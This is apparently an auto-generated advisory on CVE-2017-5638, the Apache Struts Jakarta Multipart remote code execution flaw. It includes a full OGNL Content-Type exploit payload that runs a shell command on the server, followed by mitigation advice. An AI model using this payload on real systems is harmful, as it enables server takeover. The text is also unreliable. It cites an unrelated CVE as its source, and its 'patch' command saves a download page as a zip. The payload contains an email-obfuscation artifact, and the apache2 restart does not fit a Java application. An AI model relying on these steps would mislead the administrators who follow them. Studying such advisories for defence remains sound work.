How the Mentioned CVE Works:
CVE-2017-5638 is a critical vulnerability in Apache Struts, a popular framework for building Java web applications. The flaw exists in the Jakarta Multipart parser, which is used to handle file uploads. Attackers can exploit this vulnerability by sending a crafted Content-Type header in an HTTP request. When the server processes this malicious header, it fails to properly validate the input, allowing the attacker to execute arbitrary code on the server. This vulnerability is particularly dangerous because it can be exploited remotely without authentication, making it a prime target for attackers aiming to compromise web applications.
The root cause of the issue lies in the improper handling of exception messages during file uploads. When an exception occurs, the error message is evaluated as an Object-Graph Navigation Language (OGNL) expression, which can be manipulated to execute malicious commands. This vulnerability affects Apache Struts versions 2.3.5 through 2.3.31 and 2.5 through 2.5.10. Organizations using these versions are urged to update to the latest patched versions to mitigate the risk.
DailyCVE Form:
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability: Remote Code Execution
Severity: Critical
Date: March 7, 2017
What Undercode Say:
Exploitation:
- Craft an HTTP request with a malicious Content-Type header containing OGNL expressions.
- Send the request to the target server running a vulnerable version of Apache Struts.
- The server evaluates the OGNL expression, allowing arbitrary code execution.
Example Exploit Code:
POST /example/upload.action HTTP/1.1
Host: target.com
Content-Type: %{(_='multipart/form-data').([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[bash]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd='whoami').(iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(cmds=(iswin?{'cmd.exe','/c',cmd}:{'/bin/bash','-c',cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}
Protection:
- Update Apache Struts to version 2.3.32 or 2.5.10.1 or later.
2. Implement input validation to sanitize user-supplied data.
- Use a Web Application Firewall (WAF) to filter malicious requests.
- Disable the Jakarta Multipart parser if not required.
Example Mitigation Code:
<constant name="struts.custom.i18n.resources" value="global" /> <constant name="struts.multipart.parser" value="jakarta-stream" />
Analytics:
- Affected Systems: Web applications using Apache Struts 2.3.5 – 2.3.31 or 2.5 – 2.5.10.
- Attack Vector: Remote, unauthenticated.
- Impact: Full server compromise, data theft, and potential lateral movement.
- Detection: Monitor logs for unusual Content-Type headers or OGNL expressions.
Commands:
- Check Apache Struts version:
grep -i "struts.version" /path/to/webapp/WEB-INF/lib/struts2-core-.jar
- Patch update command:
wget https://struts.apache.org/downloads.html -O struts-update.zip
- Restart server after patching:
sudo systemctl restart apache2
By following these steps, organizations can effectively mitigate the risks associated with CVE-2017-5638 and protect their web applications from exploitation.
References:
Reported By: https://www.cve.org/CVERecord?id=CVE-2024-13159
Extra Source Hub:
Undercode
